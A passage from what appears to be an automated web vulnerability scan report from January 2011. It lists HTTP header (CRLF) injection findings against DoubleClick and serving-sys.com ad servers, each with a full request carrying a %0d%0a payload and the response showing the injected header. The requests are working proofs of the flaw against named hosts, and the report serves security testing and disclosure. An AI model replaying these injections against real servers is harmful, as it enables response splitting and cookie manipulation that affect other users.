GET /1329b%0d%0a901e1fb73e9/home.pogo/spotlight HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1329b
901e1fb73e9
/home.pogo/spotlight:
Date: Sun, 09 Jan 2011 02:02:57 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.doubleclick.net/adj/pand.default/prod.backstage [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pand.default/prod.backstage

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1ee0e%0d%0a014a1f82eea was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1ee0e%0d%0a014a1f82eea/pand.default/prod.backstage HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1ee0e
014a1f82eea
/pand.default/prod.backstage:
Date: Sun, 09 Jan 2011 02:02:52 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.doubleclick.net/adj/pand.default/prod.community [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pand.default/prod.community

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 11083%0d%0a8a9bf6293f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /11083%0d%0a8a9bf6293f5/pand.default/prod.community;ag=0;gnd=0;hours=0;comped=0;fb=0;dma=0;clean=0;spgs=0;u=ag*0!gnd*0!hours*0!comped*0!fb*0!dma*0!clean*0!spgs*0;sz=728x90;tile=1;ord=1294536983566535667 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536983566535667&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/11083
8a9bf6293f5
/pand.default/prod.community%3Bag%3D0%3Bgnd%3D0%3Bhours%3D0%3Bcomped%3D0%3Bfb%3D0%3Bdma%3D0%3Bclean%3D0%3Bspgs%3D0%3Bu%3Dag%2A0%21gnd%2A0%21hours%2A0%21comped%2A0%21fb%2A0%21dma%2A0%21clean%2A0%21spgs%2A0%3Bsz%3D728x90%3Btile%3D1%3Bord%3D1294536983566535667:
Date: Sun, 09 Jan 2011 02:01:35 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.doubleclick.net/adj/prize.pogo/prizes [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/prize.pogo/prizes

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 31be3%0d%0ad74a84518d3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31be3%0d%0ad74a84518d3/prize.pogo/prizes;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=780687? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/prize/prize.do?pageSection=header_prizes
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/31be3
d74a84518d3
/prize.pogo/prizes%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D728x90%3Bord%3D780687:
Date: Sun, 09 Jan 2011 02:02:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.13. http://ad.doubleclick.net/adj/scrabble.pogo/load [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scrabble.pogo/load

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8b770%0d%0ab65cef34867 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8b770%0d%0ab65cef34867/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8b770
b65cef34867
/scrabble.pogo/load%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D500x350%3Bord%3D910319:
Date: Sun, 09 Jan 2011 02:02:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.14. http://ad.doubleclick.net/adj/scrabble.pogo/room [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scrabble.pogo/room

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4a418%0d%0ac5139b784f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4a418%0d%0ac5139b784f3/scrabble.pogo/room HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4a418
c5139b784f3
/scrabble.pogo/room:
Date: Sun, 09 Jan 2011 02:03:01 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.15. http://ad.doubleclick.net/adj/surveys.pogo/misc [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/surveys.pogo/misc

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12804%0d%0a48b5790cf88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /12804%0d%0a48b5790cf88/surveys.pogo/misc HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/12804
48b5790cf88
/surveys.pogo/misc:
Date: Sun, 09 Jan 2011 02:03:01 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.16. http://ad.doubleclick.net/jump/downloads.pogo/category [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/downloads.pogo/category

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 13037%0d%0afced369b2cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /13037%0d%0afced369b2cc/downloads.pogo/category HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/13037
fced369b2cc
/downloads.pogo/category:
Date: Sun, 09 Jan 2011 02:03:24 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.17. http://ad.doubleclick.net/jump/home.pogo/spotlight [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/home.pogo/spotlight

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 556e1%0d%0a2fda3d0e5cf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /556e1%0d%0a2fda3d0e5cf/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=1;sz=980x50;ord=759632? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/556e1
2fda3d0e5cf
/home.pogo/spotlight%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D980x50%3Bord%3D759632:
Date: Sun, 09 Jan 2011 02:03:25 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.18. http://ad.doubleclick.net/jump/prize.pogo/prizes [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/prize.pogo/prizes

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66506%0d%0acee2014b2d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66506%0d%0acee2014b2d9/prize.pogo/prizes HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/66506
cee2014b2d9
/prize.pogo/prizes:
Date: Sun, 09 Jan 2011 02:03:22 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.19. http://ad.doubleclick.net/jump/scrabble.pogo/load [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/scrabble.pogo/load

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 79e85%0d%0a73d9c50a5a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /79e85%0d%0a73d9c50a5a7/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/79e85
73d9c50a5a7
/scrabble.pogo/load%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D500x350%3Bord%3D910319:
Date: Sun, 09 Jan 2011 02:03:35 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.20. http://ad.doubleclick.net/jump/scrabble.pogo/room [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/scrabble.pogo/room

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 877c2%0d%0a03fa4dd3a61 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /877c2%0d%0a03fa4dd3a61/scrabble.pogo/room HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/877c2
03fa4dd3a61
/scrabble.pogo/room:
Date: Sun, 09 Jan 2011 02:03:24 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.21. http://ad.doubleclick.net/jump/surveys.pogo/misc [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/surveys.pogo/misc

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 64dc6%0d%0ae88543e460e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /64dc6%0d%0ae88543e460e/surveys.pogo/misc HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/64dc6
e88543e460e
/surveys.pogo/misc:
Date: Sun, 09 Jan 2011 02:03:22 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.22. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 452b0%0d%0a6b6ad7cf9b8 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0452b0%0d%0a6b6ad7cf9b8; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0452b0
6b6ad7cf9b8
; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:06:27 GMT
Connection: close


2.23. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 62e1e%0d%0a91a63bf7646 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=62e1e%0d%0a91a63bf7646; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=62e1e
91a63bf7646
&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:02:33 GMT
Connection: close
Content-Length: 0


2.24. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 73be8%0d%0adc5e96035d9 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=73be8%0d%0adc5e96035d9&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=73be8
dc5e96035d9
&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:02:31 GMT
Connection: close
Content-Length: 0


2.25. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 729cd%0d%0a9fe4d8fa7d8 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=0&res=729cd%0d%0a9fe4d8fa7d8 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=729cd
9fe4d8fa7d8
&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:02:32 GMT
Connection: close
Content-Length: 0


2.26. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 92f47%0d%0a539632693e7 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=92f47%0d%0a539632693e7&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
